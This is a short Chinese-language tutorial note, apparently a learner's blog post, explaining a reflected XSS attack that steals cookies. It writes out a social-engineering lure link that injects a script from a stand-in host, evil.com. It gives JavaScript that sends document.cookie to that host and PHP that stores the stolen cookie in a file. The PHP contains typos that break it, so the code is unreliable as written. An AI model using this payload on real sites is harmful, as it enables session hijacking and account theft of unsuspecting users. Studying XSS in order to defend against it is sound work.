参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》
主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。
一、XSS的一般过程:
1、找到XSS漏洞,假设存在于网站A;
2、发送可以触发该漏洞的,特定代码到攻击目标;
可以这样构造:<a href = "http://www.foo.com/xss/xss.php?x=<script src = http://www.evil.com/xss/hacker.js />凤姐最新性感视频</a>
其中,www.foo.com/xss/xss.php?x=是存在漏洞的网站A,执行盗取cookie操作的文件位于我们自己的网站 B。
B网站主要有两个文件,hacker.js和hacker.php
其中,hacker.js代码如下:(不是必须这么写,一个简单示例而已。)
//hacker.js
var img = new Image();
img.src = "http://www.evil.com/xss/hacker.php?X=" + document.cookie;
document.body.append(img);
hacker.php代码如下:
//hacker.php
<?php
$cookie = $_GET['x'];
var _dump($cookie);
$myFile = "cookie.txt";
file_put_contents($myFile, $cookei);
?>
3、这样当用户点击了链接(指”凤姐最新性感视频“)后,被攻击目标在网站A的cookie将被我们拿到,存到网站B和hacker.js同目录下的cookie.txt文件中。
注:在此过程中,学到的小知识还有:
1、php服务端设置cookie:
<?php
setcookie("cookie1", "value1");
?>